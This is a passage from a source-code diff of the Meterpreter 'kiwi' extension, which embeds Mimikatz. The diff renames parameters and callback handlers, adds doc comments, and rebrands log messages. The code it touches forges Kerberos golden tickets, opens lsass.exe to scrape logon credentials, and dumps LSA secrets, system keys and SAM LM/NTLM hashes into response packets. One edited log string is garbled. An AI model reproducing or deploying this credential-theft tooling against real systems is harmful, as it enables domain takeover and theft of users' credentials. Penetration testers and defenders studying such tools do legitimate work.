+ * @returns Indication of success or failure.
+ */
+DWORD mimikatz_kerberos_golden_ticket_create(char* lpUser, char* lpDomain, char* lpSid, char* lpTgt, Packet* pResponse)
{
DWORD result = 0;
BYTE* ticketBuffer;
DWORD ticketBufferSize;
- wchar_t* wUser = ascii_to_wide_string(user);
- wchar_t* wDomain = ascii_to_wide_string(domain);
- wchar_t* wSid = ascii_to_wide_string(sid);
- wchar_t* wTgt = ascii_to_wide_string(tgt);
+ wchar_t* lpwUser = ascii_to_wide_string(lpUser);
+ wchar_t* lpwDomain = ascii_to_wide_string(lpDomain);
+ wchar_t* lpwSid = ascii_to_wide_string(lpSid);
+ wchar_t* lpwTgt = ascii_to_wide_string(lpTgt);
do
{
- if (!wUser || !wDomain || !wSid || !wTgt)
+ if (!lpwUser || !lpwDomain || !lpwSid || !lpwTgt)
{
- dprintf("[MIMIKTAZ] Out of memory");
+ dprintf("[KIWI] Out of memory");
result = ERROR_NOT_ENOUGH_MEMORY;
}
- result = kuhl_m_kerberos_create_golden_ticket(wUser, wDomain, wSid, wTgt, &ticketBuffer, &ticketBufferSize);
+ result = kuhl_m_kerberos_create_golden_ticket(lpwUser, lpwDomain, lpwSid, lpwTgt, &ticketBuffer, &ticketBufferSize);
if (result != ERROR_SUCCESS)
{
break;
}
- packet_add_tlv_raw(response, TLV_TYPE_KIWI_KERB_TKT_RAW, ticketBuffer, ticketBufferSize);
+ packet_add_tlv_raw(pResponse, TLV_TYPE_KIWI_KERB_TKT_RAW, ticketBuffer, ticketBufferSize);
} while (0);
- if (wUser)
+ if (lpwUser)
{
- free(wUser);
+ free(lpwUser);
}
- if (wDomain)
+ if (lpwDomain)
{
- free(wDomain);
+ free(lpwDomain);
}
- if (wSid)
+ if (lpwSid)
{
- free(wSid);
+ free(lpwSid);
}
- if (wTgt)
+ if (lpwTgt)
{
- free(wTgt);
+ free(lpwTgt);
}
return result;
}
-DWORD mimikatz_kerberos_ticket_use(BYTE* buffer, DWORD bufferSize)
+/*!
+ * @brief Apply the given kerberos ticket to the current session.
+ * @param lpBuffer Pointer to the ticket content.
+ * @param dwBufferSize The size of the data in the ticket buffer.
+ * @returns Indication of success or failure.
+ */
+DWORD mimikatz_kerberos_ticket_use(LPBYTE lpBuffer, DWORD dwBufferSize)
{
- return kuhl_m_kerberos_use_ticket(buffer, bufferSize);
+ return kuhl_m_kerberos_use_ticket(lpBuffer, dwBufferSize);
}
-
-VOID PolicyVersionHandler(LPVOID lpContext, USHORT usMajor, USHORT usMinor)
+/*!
+ * @brief Callback handler for policy version information.
+ * @param lpContext Pointer to the callback context, which in this case is the Packet*.
+ * @param usMajor The major version number for the policy subsystem.
+ * @param usMinor The minor version number for the policy subsystem.
+ */
+VOID policy_version_handler(LPVOID lpContext, USHORT usMajor, USHORT usMinor)
{
Packet *response = (Packet*)lpContext;
@@ -368,14 +457,25 @@ VOID PolicyVersionHandler(LPVOID lpContext, USHORT usMajor, USHORT usMinor)
packet_add_tlv_uint(response, TLV_TYPE_KIWI_LSA_VER_MIN, (UINT)usMinor);
}
-VOID Nt5KeyHandler(LPVOID lpContext, DWORD dwIndex, PNT5_SYSTEM_KEY pSysKey)
+/*!
+ * @brief Callback handler for NT5 key results.
+ * @param lpContext Pointer to the callback context, which in this case is the Packet*.
+ * @param pSysKey Pointer to the key that has been located.
+ */
+VOID nt5_key_handler(LPVOID lpContext, PNT5_SYSTEM_KEY pSysKey)
{
Packet *response = (Packet*)lpContext;
dprintf("[KIWI LSA] nt5 Key");
packet_add_tlv_raw(response, TLV_TYPE_KIWI_LSA_NT5KEY, pSysKey->key, sizeof(NT5_SYSTEM_KEY));
}
-VOID Nt6KeyHandler(LPVOID lpContext, DWORD dwIndex, PNT6_SYSTEM_KEY pSysKey)
+/*!
+ * @brief Callback handler for NT6 key results.
+ * @param lpContext Pointer to the callback context, which in this case is the Packet*.
+ * @param dwIndex The index of the key in the array of keys found.
+ * @param pSysKey Pointer to the key that has been located.
+ */
+VOID nt6_key_handler(LPVOID lpContext, DWORD dwIndex, PNT6_SYSTEM_KEY pSysKey)
{
Tlv entities[3];
Packet *response = (Packet*)lpContext;
@@ -399,33 +499,63 @@ VOID Nt6KeyHandler(LPVOID lpContext, DWORD dwIndex, PNT6_SYSTEM_KEY pSysKey)
packet_add_tlv_group(response, TLV_TYPE_KIWI_LSA_NT6KEY, entities, 3);
}
-VOID Nt6KeyStreamHandler(LPVOID lpContext, PNT6_SYSTEM_KEYS pSysKeyStream)
+/*!
+ * @brief Callback handler for NT6 key streams.
+ * @param lpContext Pointer to the callback context, which in this case is the Packet*.
+ * @param pSysKeyStream Pointer to the key that has been located.
+ * @remark This function probably isn't necessary in the grand scheme of things as it doesn't
+ * contain anything other than the count. Leaving it in for now though.
+ */
+VOID nt6_key_stream_handler(LPVOID lpContext, PNT6_SYSTEM_KEYS pSysKeyStream)
{
Packet *response = (Packet*)lpContext;
dprintf("[KIWI LSA] nt6 Key stream: %u keys", pSysKeyStream->nbKeys);
packet_add_tlv_uint(response, TLV_TYPE_KIWI_LSA_KEYCOUNT, pSysKeyStream->nbKeys);
}
-VOID CompNameHandler(LPVOID lpContext, wchar_t* lpwComputerName)
+/*!
+ * @brief Callback handler for the resulting computer name.
+ * @param lpContext Pointer to the callback context, which in this case is the Packet*.
+ * @param lpwComputerName Pointer to the computer name.
+ */
+VOID comp_name_handler(LPVOID lpContext, wchar_t* lpwComputerName)
{
Packet *response = (Packet*)lpContext;
+
dprintf("[KIWI LSA] Computer Name: %S", lpwComputerName);
packet_add_tlv_wstring(response, TLV_TYPE_KIWI_LSA_COMPNAME, lpwComputerName);
}
-VOID SysKeyHandler(LPVOID lpContext, LPBYTE pKey, DWORD dwKeyLen)
+/*!
+ * @brief Callback handler for the system key result
+ * @param lpContext Pointer to the callback context, which in this case is the Packet*.
+ * @param pKey Pointer to the key data.
+ * @param dwKeyLen The length of the key data.
+ */
+VOID sys_key_handler(LPVOID lpContext, LPBYTE pKey, DWORD dwKeyLen)
{
Packet *response = (Packet*)lpContext;
dprintf("[KIWI LSA] SysKey: %u bytes", dwKeyLen);
packet_add_tlv_raw(response, TLV_TYPE_KIWI_LSA_SYSKEY, pKey, dwKeyLen);
}
-VOID SecretHandler(LPVOID lpContext, wchar_t* lpwSecretName, wchar_t* lpwServiceInfo, LPBYTE pMd4Digest, LPVOID pCurrent, DWORD dwCurrentSize, LPVOID pOld, DWORD dwOldSize)
+/*!
+ * @brief Callback handler for an LSA secret result dump.
+ * @param lpContext Pointer to the callback context, which in this case is the Packet*.
+ * @param lpwSecretName The name of the dumped secret.
+ * @param lpwServiceInfo Information about the dumped service secret.
+ * @param pMd4Digest Pointer to the MD4 digest associated with this secret.
+ * @param pCurrent Pointer to the current secret value.
+ * @param dwCurrentSize Size of the data pointed to by pCurrent.
+ * @param pOld Pointer to the old/previous secret value.
+ * @param dwOldSize Size of the data pointed to by pOld.
+ */
+VOID lsa_secret_handler(LPVOID lpContext, wchar_t* lpwSecretName, wchar_t* lpwServiceInfo, LPBYTE pMd4Digest, LPVOID pCurrent, DWORD dwCurrentSize, LPVOID pOld, DWORD dwOldSize)
{
Tlv entries[5];
DWORD dwCount = 0;
Packet *response = (Packet*)lpContext;
- LPSTR lpServiceInfo = NULL, lpCurrent = NULL, lpOld = NULL;
+ LPSTR lpSecretName = NULL, lpServiceInfo = NULL, lpCurrent = NULL, lpOld = NULL;
dprintf("[KIWI LSA] Handling secret: %S", lpwSecretName);
@@ -436,7 +566,7 @@ VOID SecretHandler(LPVOID lpContext, wchar_t* lpwSecretName, wchar_t* lpwService
return;
}
- packet_add_tlv_wstring_entry(&entries[dwCount++], TLV_TYPE_KIWI_LSA_SECRET_NAME, lpwSecretName, 0);
+ lpSecretName = packet_add_tlv_wstring_entry(&entries[dwCount++], TLV_TYPE_KIWI_LSA_SECRET_NAME, lpwSecretName, 0);
if (lpwServiceInfo)
{
@@ -485,6 +615,10 @@ VOID SecretHandler(LPVOID lpContext, wchar_t* lpwSecretName, wchar_t* lpwService
packet_add_tlv_group(response, TLV_TYPE_KIWI_LSA_SECRET, entries, dwCount);
+ if (lpSecretName != NULL)
+ {
+ free(lpSecretName);
+ }
if (lpServiceInfo != NULL)
{
free(lpServiceInfo);
@@ -499,13 +633,24 @@ VOID SecretHandler(LPVOID lpContext, wchar_t* lpwSecretName, wchar_t* lpwService
}
}
-VOID SamHashHandler(LPVOID lpContext, DWORD dwRid, wchar_t* lpwUser, DWORD dwUserLength, BOOL hasLmHash, BYTE lmHash[LM_NTLM_HASH_LENGTH], BOOL hasNtlmHash, BYTE ntlmHash[LM_NTLM_HASH_LENGTH])
+/*!
+ * @brief Callback handler for a dumped SAM hash.
+ * @param lpContext Pointer to the callback context, which in this case is the Packet*.
+ * @param dwRid The RID of the SAM.
+ * @param lpwUser Pointer to the user associated with the SAM.
+ * @param hasLmHash Indication of whether an LM hash was found.
+ * @param lmHash The LM has bytes, if found.
+ * @param hasNtlmHash Indication of whether an NTLM hash was found.
+ * @param ntlmHash The NTLM has bytes, if found.
+ */
+VOID sam_hash_handler(LPVOID lpContext, DWORD dwRid, wchar_t* lpwUser, DWORD dwUserLength, BOOL hasLmHash, BYTE lmHash[LM_NTLM_HASH_LENGTH], BOOL hasNtlmHash, BYTE ntlmHash[LM_NTLM_HASH_LENGTH])
{
Tlv entries[4];
DWORD dwCount = 0;
Packet *response = (Packet*)lpContext;
LPSTR lpSamUser = NULL;
+ // only add the result if we have one of the hashes and a user name.
if ((hasLmHash || hasNtlmHash) && lpwUser)
{
dprintf("[KIWI SAM] Adding %S rid %u (%x)", lpwUser, dwRid, dwRid);
@@ -548,22 +693,27 @@ VOID SamHashHandler(LPVOID lpContext, DWORD dwRid, wchar_t* lpwUser, DWORD dwUse
}
}
-DWORD mimikatz_lsa_dump_secrets(Packet* response)
+/*!
+ * @brief Dump LSA secrets.
+ * @param pResponse Pointer to the packet that will contain the response.
+ * @returns Indication of success or failure.
+ */
+DWORD mimikatz_lsa_dump_secrets(Packet* pResponse)
{
LSA_CALLBACK_CTX callbackCtx;
ZeroMemory(&callbackCtx, sizeof(callbackCtx));
// we want the context to be the packet, so that elements
// can be added directly to the packet
- callbackCtx.lpContext = response;
- callbackCtx.pCompNameHandler = CompNameHandler;
- callbackCtx.pSysKeyHandler = SysKeyHandler;
- callbackCtx.pPolicyVersionHandler = PolicyVersionHandler;
- callbackCtx.pNt6KeyStreamHandler = Nt6KeyStreamHandler;
- callbackCtx.pNt6KeyHandler = Nt6KeyHandler;
- callbackCtx.pNt5KeyHandler = Nt5KeyHandler;
- callbackCtx.pSecretHandler = SecretHandler;
- callbackCtx.pSamHashHandler = SamHashHandler;
+ callbackCtx.lpContext = pResponse;
+ callbackCtx.pCompNameHandler = comp_name_handler;
+ callbackCtx.pSysKeyHandler = sys_key_handler;
+ callbackCtx.pPolicyVersionHandler = policy_version_handler;
+ callbackCtx.pNt6KeyStreamHandler = nt6_key_stream_handler;
+ callbackCtx.pNt6KeyHandler = nt6_key_handler;
+ callbackCtx.pNt5KeyHandler = nt5_key_handler;
+ callbackCtx.pSecretHandler = lsa_secret_handler;
+ callbackCtx.pSamHashHandler = sam_hash_handler;
return kuhl_m_lsadump_full(&callbackCtx);
}
\ No newline at end of file
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/mimikatz_interface.h b/c/meterpreter/source/extensions/kiwi/mimikatz/mimikatz_interface.h
index b8700b77..e705397b 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/mimikatz_interface.h
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/mimikatz_interface.h
@@ -1,14 +1,19 @@
+/*!
+ * @file mimikatz_interface.h
+ * @brief Declaration of bridging functions which talk to Mimikatz 2.
+ * @remark Also contains helpful forward declarations.
+ */
#ifndef _METERPRETER_SOURCE_EXTENSION_MIMIKATZ_MIMIKATZ_INTERFACE_H
#define _METERPRETER_SOURCE_EXTENSION_MIMIKATZ_MIMIKATZ_INTERFACE_H
typedef struct _Packet Packet;
-DWORD mimikatz_initOrClean(BOOL Init);
-DWORD mimikatz_scrape_passwords(DWORD cmdId, Packet* packet);
-DWORD mimikatz_kerberos_golden_ticket_create(LPSTR user, LPSTR domain, LPSTR sid, LPSTR ntlm, Packet* response);
-DWORD mimikatz_kerberos_ticket_use(BYTE* buffer, DWORD bufferSize);
+DWORD mimikatz_init_or_clean(BOOL bInit);
+DWORD mimikatz_scrape_passwords(DWORD dwCmdId, Packet* pResponse);
+DWORD mimikatz_kerberos_golden_ticket_create(LPSTR lpUser, LPSTR lpDomain, LPSTR lpSid, LPSTR lpNtlm, Packet* pResponse);
+DWORD mimikatz_kerberos_ticket_use(BYTE* pBuffer, DWORD dwBufferSize);
DWORD mimikatz_kerberos_ticket_purge();
-DWORD mimikatz_kerberos_ticket_list(BOOL bExport, Packet* response);
-DWORD mimikatz_lsa_dump_secrets(Packet* response);
+DWORD mimikatz_kerberos_ticket_list(BOOL bExport, Packet* pResponse);
+DWORD mimikatz_lsa_dump_secrets(Packet* pResponse);
#endif
\ No newline at end of file
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/kuhl_m_lsadump.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/kuhl_m_lsadump.c
index 44708e12..76df1d1a 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/kuhl_m_lsadump.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/kuhl_m_lsadump.c
@@ -509,7 +509,7 @@ BOOL kuhl_m_lsadump_getLsaKeyAndSecrets(IN PKULL_M_REGISTRY_HANDLE hSecurity, IN
kull_m_string_wprintf_hex(nt5key->key, sizeof(NT5_SYSTEM_KEY), 0);
kprintf(L"\n");
if (callbackCtx && callbackCtx->pNt5KeyHandler)
- callbackCtx->pNt5KeyHandler(callbackCtx->lpContext, i, nt5key);
+ callbackCtx->pNt5KeyHandler(callbackCtx->lpContext, nt5key);
}
}
}
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/kuhl_m_lsadump_struct.h b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/kuhl_m_lsadump_struct.h
index 9c8fc869..d1ba1d77 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/kuhl_m_lsadump_struct.h
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/kuhl_m_lsadump_struct.h
@@ -245,7 +245,7 @@ typedef struct _MSCACHE_DATA {
typedef struct _LSA_CALLBACK_CTX
{
VOID (*pPolicyVersionHandler)(LPVOID lpContext, USHORT usMajor, USHORT usMinor);
- VOID (*pNt5KeyHandler)(LPVOID lpContext, DWORD dwIndex, PNT5_SYSTEM_KEY pSysKey);
+ VOID (*pNt5KeyHandler)(LPVOID lpContext, PNT5_SYSTEM_KEY pSysKey);
VOID (*pNt6KeyHandler)(LPVOID lpContext, DWORD dwIndex, PNT6_SYSTEM_KEY pSysKey);
VOID (*pNt6KeyStreamHandler)(LPVOID lpContext, PNT6_SYSTEM_KEYS pSyskeyStream);
VOID (*pCompNameHandler)(LPVOID lpContext, wchar_t* lpwComputerName);
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/crypto/kuhl_m_sekurlsa_nt5.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/crypto/kuhl_m_sekurlsa_nt5.c
index 9bf36ce8..9d732a73 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/crypto/kuhl_m_sekurlsa_nt5.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/crypto/kuhl_m_sekurlsa_nt5.c
@@ -90,7 +90,7 @@ NTSTATUS kuhl_m_sekurlsa_nt5_init()
}
}
}
- } else PRINT_ERROR(L"[MIMIKATZ] failed to load lsasrv");
+ } else PRINT_ERROR(L"[KIWI] failed to load lsasrv");
}
return kuhl_m_sekurlsa_nt5_KeyInit;
}
diff --git a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
index ce14f5db..7a436207 100644
--- a/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
+++ b/c/meterpreter/source/extensions/kiwi/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
@@ -93,8 +93,10 @@ NTSTATUS kuhl_m_sekurlsa_process(int argc, wchar_t * argv[])
NTSTATUS kuhl_m_sekurlsa_minidump(int argc, wchar_t * argv[])
{
kprintf(L"Switch to MINIDUMP\n");
- if(argc != 1)
- dprintf(L"[MIMIKATZ] <minidumpfile.dmp> argument is missing\n");
+ if (argc != 1)
+ {
+ dprintf(L"[KIWI] <minidumpfile.dmp> argument is missing\n");
+ }
else
{
kuhl_m_sekurlsa_reset();
@@ -144,7 +146,7 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_range(PMEMORY_BASIC_INFORMATION pMemoryBasicI
NTSTATUS kuhl_m_sekurlsa_all(int argc, wchar_t * argv[])
{
- dprintf(L"[MIMIKATZ] Running kuhl_m_sekurlsa_getLogonData");
+ dprintf(L"[KIWI] Running kuhl_m_sekurlsa_getLogonData");
return kuhl_m_sekurlsa_getLogonData(lsassPackages, sizeof(lsassPackages) / sizeof(PKUHL_M_SEKURLSA_PACKAGE), NULL, NULL);
}
@@ -169,7 +171,7 @@ NTSTATUS kuhl_m_sekurlsa_acquireLSA()
PMINIDUMP_SYSTEM_INFO pInfos;
DWORD processRights = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE;
- dprintf(L"[MIMIKATZ] Attempting to acquire LSA");
+ dprintf(L"[KIWI] Attempting to acquire LSA");
if(!cLsass.hLsassMem)
{
@@ -186,7 +188,7 @@ NTSTATUS kuhl_m_sekurlsa_acquireLSA()
Type = KULL_M_MEMORY_TYPE_PROCESS;
if(kull_m_process_getProcessIdForName(L"lsass.exe", &pid))
hData = OpenProcess(processRights, FALSE, pid);
- else dprintf(L"[MIMIKATZ] LSASS process not found (?)\n");
+ else dprintf(L"[KIWI] LSASS process not found (?)\n");
}
if(hData && hData != INVALID_HANDLE_VALUE)
@@ -202,16 +204,22 @@ NTSTATUS kuhl_m_sekurlsa_acquireLSA()
cLsass.osContext.BuildNumber = pInfos->BuildNumber;
if(cLsass.osContext.MajorVersion != MIMIKATZ_NT_MAJOR_VERSION)
- dprintf(L"[MIMIKATZ] Minidump pInfos->MajorVersion (%u) != MIMIKATZ_NT_MAJOR_VERSION (%u)\n", pInfos->MajorVersion, MIMIKATZ_NT_MAJOR_VERSION);
+ {
+ dprintf(L"[KIWI] Minidump pInfos->MajorVersion (%u) != MIMIKATZ_NT_MAJOR_VERSION (%u)\n", pInfos->MajorVersion, MIMIKATZ_NT_MAJOR_VERSION);
+ }
#ifdef _M_X64
- if(pInfos->ProcessorArchitecture != PROCESSOR_ARCHITECTURE_AMD64)
- dprintf(L"[MIMIKATZ] Minidump pInfos->ProcessorArchitecture (%u) != PROCESSOR_ARCHITECTURE_AMD64 (%u)\n", pInfos->ProcessorArchitecture, PROCESSOR_ARCHITECTURE_AMD64);
+ if (pInfos->ProcessorArchitecture != PROCESSOR_ARCHITECTURE_AMD64)
+ {
+ dprintf(L"[KIWI] Minidump pInfos->ProcessorArchitecture (%u) != PROCESSOR_ARCHITECTURE_AMD64 (%u)\n", pInfos->ProcessorArchitecture, PROCESSOR_ARCHITECTURE_AMD64);
+ }
#elif defined _M_IX86
- if(pInfos->ProcessorArchitecture != PROCESSOR_ARCHITECTURE_INTEL)
- dprintf(L"[MIMIKATZ] Minidump pInfos->ProcessorArchitecture (%u) != PROCESSOR_ARCHITECTURE_INTEL (%u)\n", pInfos->ProcessorArchitecture, PROCESSOR_ARCHITECTURE_INTEL);
+ if (pInfos->ProcessorArchitecture != PROCESSOR_ARCHITECTURE_INTEL)
+ {
+ dprintf(L"[KIWI] Minidump pInfos->ProcessorArchitecture (%u) != PROCESSOR_ARCHITECTURE_INTEL (%u)\n", pInfos->ProcessorArchitecture, PROCESSOR_ARCHITECTURE_INTEL);
+ }
#endif
}
- else dprintf(L"[MIMIKATZ] Minidump without SystemInfoStream (?)\n");
+ else dprintf(L"[KIWI] Minidump without SystemInfoStream (?)\n");
}
else
{
@@ -229,16 +237,18 @@ NTSTATUS kuhl_m_sekurlsa_acquireLSA()
{
status = lsassLocalHelper->AcquireKeys(&cLsass, &lsassPackages[0]->Module.Informations);
- if(!NT_SUCCESS(status))
- dprintf(L"[MIMIKATZ] Key import\n");
+ if (!NT_SUCCESS(status))
+ {
+ dprintf(L"[KIWI] Key import failed\n");
+ }
}
- else dprintf(L"[MIMIKATZ] Logon list\n");
+ else dprintf(L"[KIWI] Logon list failed\n");
}
- else dprintf(L"[MIMIKATZ] Modules informations\n");
+ else dprintf(L"[KIWI] Modules informations failed\n");
}
- else dprintf(L"[MIMIKATZ] Memory opening\n");
+ else dprintf(L"[KIWI] Memory opening\ failedn");
}
- else dprintf(L"[MIMIKATZ] Handle of memory : %08x\n", GetLastError());
+ else dprintf(L"[KIWI] Handle of memory : %08x\n", GetLastError());
if(!NT_SUCCESS(status))
{
@@ -246,7 +256,7 @@ NTSTATUS kuhl_m_sekurlsa_acquireLSA()
CloseHandle(hData);
}
}
- else dprintf(L"[MIMIKATZ] Local LSA library failed\n");
+ else dprintf(L"[KIWI] Local LSA library failed\n");
}
return status;
}
@@ -279,7 +289,7 @@ NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalDa
if(NT_SUCCESS(status))
{
- dprintf(L"[MIMIKATZ] Acquired LSA");
+ dprintf(L"[KIWI] Acquired LSA");
sessionData.cLsass = &cLsass;
sessionData.lsassLocalHelper = lsassLocalHelper;
@@ -299,7 +309,7 @@ NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalDa
kull_m_memory_copy(&data, &securityStruct, sizeof(ULONG));
else *(PULONG) data.address = 1;
- dprintf(L"[MIMIKATZ] iterating %d lists", nbListes);
+ dprintf(L"[KIWI] iterating %d lists", nbListes);
for(i = 0; i < nbListes; i++)
{
securityStruct.address = &LogonSessionList[i];
@@ -307,10 +317,10 @@ NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalDa
data.hMemory = &hLocalMemory;
if(aBuffer.address = LocalAlloc(LPTR, helper->tailleStruct))
{
- dprintf(L"[MIMIKATZ] List %d allocated", i);
+ dprintf(L"[KIWI] List %d allocated", i);
if(kull_m_memory_copy(&data, &securityStruct, sizeof(PVOID)))
{
- dprintf(L"[MIMIKATZ] List %d memory copied", i);
+ dprintf(L"[KIWI] List %d memory copied", i);
data.address = pStruct;
data.hMemory = securityStruct.hMemory;
@@ -326,7 +336,7 @@ NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalDa
sessionData.pCredentials= *(PVOID *) ((PBYTE) aBuffer.address + helper->offsetToCredentials);
sessionData.pSid = *(PSID *) ((PBYTE) aBuffer.address + helper->offsetToPSid);
- dprintf(L"[MIMIKATZ] List %d getting strings", i);
+ dprintf(L"[KIWI] List %d getting strings", i);
kull_m_string_getUnicodeString(sessionData.UserName, cLsass.hLsassMem);
kull_m_string_getUnicodeString(sessionData.LogonDomain, cLsass.hLsassMem);
kuhl_m_sekurlsa_utils_getSid(&sessionData.pSid, cLsass.hLsassMem);
@@ -348,7 +358,7 @@ NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalDa
}
else
{
- dprintf(L"[MIMIKATZ] Failed to acquire LSA: %u %x", status, status);
+ dprintf(L"[KIWI] Failed to acquire LSA: %u %x", status, status);
}
return status;
}
@@ -357,7 +367,7 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_logondata(IN PKIWI_BASIC_SECURITY_LO
{
PKUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA pLsassData = (PKUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA) pOptionalData;
ULONG i;
- dprintf(L"[MIMIKATZ] callback invoked with %p", pData);
+ dprintf(L"[KIWI] callback invoked with %p", pData);
if((pData->LogonType != Network)/* && pData->LogonType != UndefinedLogonType*/)
{
kuhl_m_sekurlsa_printinfos_logonData(pData);
diff --git a/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj b/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj
index ac5f9754..b4701859 100644
--- a/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj
+++ b/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj
@@ -630,9 +630,6 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ClInclude Include="..\..\source\extensions\kiwi\modules\kull_m_string.h" />
<ClInclude Include="..\..\source\extensions\kiwi\modules\kull_m_token.h" />
</ItemGroup>
- <ItemGroup>
- <ResourceCompile Include="..\..\source\extensions\kiwi\mimikatz\mimikatz.rc" />
- </ItemGroup>
<ItemGroup>
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\main.c" />
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\mimikatz.c" />
diff --git a/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj.filters b/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj.filters
index f671dd7d..0b125ea9 100644
--- a/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj.filters
+++ b/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj.filters
@@ -153,9 +153,6 @@
<Filter>modules\kerberos</Filter>
</ClInclude>
</ItemGroup>
- <ItemGroup>
- <ResourceCompile Include="..\..\source\extensions\kiwi\mimikatz\mimikatz.rc" />
- </ItemGroup>
<ItemGroup>
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt5.c">
<Filter>modules\sekurlsa\crypto</Filter>